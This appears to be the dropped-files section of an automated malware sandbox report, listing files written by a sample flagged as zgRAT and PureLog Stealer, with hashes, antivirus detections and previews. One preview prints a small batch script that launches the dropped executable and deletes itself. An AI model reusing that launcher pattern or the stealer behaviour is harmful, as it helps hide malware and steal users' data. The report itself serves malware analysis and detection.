                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\19TzMtmWeK

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\83e4bb2f5cabf1

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:ASCII text, with very long lines (701), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):701
                                                                                                                  Entropy (8bit):5.89743604568768
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Ma1lhokNFvEE+AA+RQjfzA7qcE0j8RQYXHCoXAHYsuWgsHM0FGB3CY2w7M9ulLm:rEEjdQjf4qSMNZ+5uWg6rWuw7dlLm
                                                                                                                  MD5:71B8474E859D543BB8489DA42E270634
                                                                                                                  SHA1:2230E8E932C74851E4EE104676B112BDAA4E1E34
                                                                                                                  SHA-256:633D5393926EA8661DA3C6910864198C340B1218036386458AB855DEF6944810
                                                                                                                  SHA-512:576C885A967ADB0A9DEB72F89B6CF5E2070D90676704C3EB7E57B1FFA376A7CFF3CA114B7C0B4E9BD960866B4803303CD3DDD35C24A1573616EBFC259E03A37C
                                                                                                                  Malicious:false
                                                                                                                  Preview:k07HEtA7hLe48MUYRIZisaW1FBf96OoPAI0OceA6XfhfKHuqJUKHO88KdFBDNBASgP40VF6xHcKN21q8QyzlDhBBJpuWc7sWeO85N4VEYX9wyvSmYDwZLZO9O3qpUjUKtxso2vvWdvNqhOMYXH7YKTLF98rTNptzCzCADntnSa6aLic9qSRMl69ammo4EbIxBXosMMVuYUGtWu3bgrn4XhNGzlXa8zi0RIZy3twd7hyRzPD1sNXWxOaeKi2ly4viwQcOVFiw4J7zs6RjhfrvcLCDr4nU1LpDwQeixzgnokcoRkwORTDSM9FkNYgacN5te3Dbbsvs9EG1tYwHIZDiIW0xK4VZTFKbpsJXhUwjhVTH2O0zmZRDJXlIDQQgXWY34pMAPZjymeAwDs46Egx3yHRRHBTRDQLK6ZNNBzjMzdapWyEUVUc1jfFwX43NFSvWS00oeq4O6kEUqm5T685txUlbTb0H6WHhsEXg7a0pZO58auGu9jQGWBi7OZUD0xRjchmlPZWgIQTiZmAiUFHXFBKqfZRiFwyl6Vg3IefkNu7Gs9hlYwsuq4dbX6FzHxaWbrmEGHa0jhJVDD7f1pJSDE5B1EgLYqcZTlpAXdeRW2KIvIYT8k7boISXwkMCkPb3FtCbY7IXL16L3xQtpMMysBvLTRNxQcqHaRDBG75BbkQwLHe9TdWXCnLD80HGt

                                                                                                                  C:\Users\user\AppData\Local\Temp\8YqVQejYeT

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\AGWyBc6rNm

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\BdFjFszUsR

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\E6dmBVnjFo

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\GaETXPxbYD

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49152
                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\GsKzultPns

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.163856189774724
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:sodqrBjQVKBn:sAqrVtBn
                                                                                                                  MD5:DD6EE51E1E770D91820C6DBBEBAFCD0A
                                                                                                                  SHA1:BE7AC8CEB2710CF816DA10262A66DAF7AC59CEDD
                                                                                                                  SHA-256:A167A41FDECD16E44CCA605D9DB9E5C5043AE0ACA0FBF274905DD86CC38BE209
                                                                                                                  SHA-512:3C367E9CD482F88FFEDDF4CD8E7AAD503B5E63D4A590B09A1817EA79944FC2538C9CDE6170DE6CDCA1DEC0ED75F125D4ED6A3F8974625A1C86A58E1D5D149C68
                                                                                                                  Malicious:false
                                                                                                                  Preview:RLWIu9AMxOdxFTEwF9DPzzRGd

                                                                                                                  C:\Users\user\AppData\Local\Temp\Kqq2Zyhu2W

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\Um9wZYC743

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\ZjMHDc3x6b

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ubl0fu1.zaf.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3ahotz1.4zu.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnt5hw2a.ere.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxd1j1gp.akb.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):185
                                                                                                                  Entropy (8bit):5.2234515926159935
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5xAIcuJzPJHBvBktKcKZG1t+kiE2J5xAV:hCRLuVFOOr+DE1wkn23fJzxHBvKOZG1n
                                                                                                                  MD5:9DA785D6C0E5B8A2E11B209A4D0EAD2C
                                                                                                                  SHA1:476C92CAAA5D56AC29586E8737B8931777E4A352
                                                                                                                  SHA-256:7B6565DEAF7C967118E52022321AAD502F184FEAD9FB8E577ACD8D7AFF226987
                                                                                                                  SHA-512:66E56B8B20E2BCBB8F9569853D694A938414736707ED993C29DFE1E907EA182B80BEE40D791731FDD820D50FBEBADE1D9708A16C8555E517443E74A79B732E67
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\hlVW2PE0oG.bat"

                                                                                                                  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2009600
                                                                                                                  Entropy (8bit):7.5678452559926175
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:Z1ijXQywiXW604Jjh42gv9Gk2AWDpL5ml:Z1IZXWCJjhZgHW1N4
                                                                                                                  MD5:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  SHA1:0D9CE3815F04C401561339B056C7AB2BA907E16C
                                                                                                                  SHA-256:92C34270DF9842C931AB9E4AF87A0CBDD1F3B12E70482D474C3A9D0029F09ADD
                                                                                                                  SHA-512:C7516E29A99FC053D07DA626BDCE8AB37917267DE2911685DEBD3E0764819B3A387626D98413EC62808789E28E15739E0B533A9C8AB765215506BDF6AD5EF707
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ............@.....................................K.......p............................................................................ ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H.......|...........l...|...x............................................0..........(.... ........8........E....)...*...N.......8$...(.... ....~....{....:....& ....8....*(.... ....~....{o...:....& ....8....(.... ....~....{e...9....& ....8y......0..U....... ........8........E........5...m.......)...I.......8....8*... ....~....{....:....& ....8....r...ps....z*...... ........8....8.... ....~....{....:}...& ....8r...~....(@... .... .... ....s....~....(D....... ....~....{....92...

                                                                                                                  C:\Users\user\AppData\Local\Temp\nSODSVabQG

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\tkifOC4DT5

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\uFBulWQAfW

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.243856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qVuT5Sn:qASn
                                                                                                                  MD5:FE384112227DFA2593CAB2C6C84D24C6
                                                                                                                  SHA1:35862614DDC1033EAF1B5646FD3560EE2308B829
                                                                                                                  SHA-256:FCDD97F3B537F0E1CC5CDACAF37521CECF808BBDE312150FB8883F1F7AF026F2
                                                                                                                  SHA-512:3C4EC3EC59D32B3528A46ACAEDD91BEEE36682BC9EAA66D750ED80DCC852A7FB498F8C96B448E063AEB662EA265C09FC2573A744A3297903BD10A0DDDEE971DF
                                                                                                                  Malicious:false
                                                                                                                  Preview:O40lsAEXBnv2IYY72dU7cMavB

                                                                                                                  C:\Users\user\Desktop\GYwcCMoE.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 00onP4lQDK.exe, Detection: malicious, Browse
                                                                                                                  • Filename: hjgesadfseawd.exe, Detection: malicious, Browse
                                                                                                                  • Filename: lfcdgbuksf.exe, Detection: malicious, Browse
                                                                                                                  • Filename: kyhjasehs.exe, Detection: malicious, Browse
                                                                                                                  • Filename: adjthjawdth.exe, Detection: malicious, Browse
                                                                                                                  • Filename: qNdO4D18CF.exe, Detection: malicious, Browse
                                                                                                                  • Filename: iN1fhAtzW2.exe, Detection: malicious, Browse
